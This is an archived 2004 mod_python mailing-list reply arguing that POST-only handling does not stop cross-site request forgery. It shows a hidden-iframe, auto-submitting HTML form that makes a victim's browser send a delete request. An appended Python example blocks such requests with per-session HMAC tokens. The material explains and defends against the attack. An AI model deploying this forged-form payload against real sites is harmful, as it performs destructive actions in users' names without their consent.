[mod_python] Questions on _call_ with mp servlets and python

mike bayer mike_mp at zzzcomputing.com
Fri Sep 3 17:26:39 EDT 2004

> On Friday 03 September 2004 20:35, David Fraser wrote:
> If you don't use the query string parameters when you are expecting POST
> variables, then your users are not susceptible to this form of attack.

sadly, not true:

<IFRAME width="0" height="0" src="myattack.html"></IFRAME>


<body onload="myform.submit()">
<form name="myform" method="POST" action="http://www.example.com/script">
<input type="hidden" name="deletesomething" value="true">
</form>
</body>
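
A server-side check that rejects the auto-submitted POST shown above, as an added example (not part of the original post and not mod_python's own code). The function names, the csrf_token field name and the session id are assumptions made for illustration; the browser sends the victim's session cookie with the forged form, but the attacking page cannot read the per-session token.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret that never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id):
    """Token the site embeds as a hidden field in forms it renders itself."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(method, session_id, form):
    """Allow a state-changing request only if it carries this session's token."""
    if method in ("GET", "HEAD"):
        return True  # safe methods must not change state in the first place
    supplied = str(form.get("csrf_token", ""))
    expected = issue_token(session_id)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(supplied.encode(), expected.encode())


def handle_post(session_id, form, store):
    """Hypothetical handler for the /script action used in the post."""
    if not is_request_allowed("POST", session_id, form):
        return 403
    if form.get("deletesomething") == "true":
        store.clear()
    return 200


def demo():
    sid = "sess-constructed-1"  # constructed sample session id
    store = {"record": "keep me"}
    # Cross-site form: only the fields from the post, no token.
    forged = handle_post(sid, {"deletesomething": "true"}, store)
    survived = bool(store)
    # Form rendered by the site itself: includes the session's token.
    own = handle_post(
        sid, {"deletesomething": "true", "csrf_token": issue_token(sid)}, store
    )
    return forged, survived, own, store


if __name__ == "__main__":
    print(demo())
```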
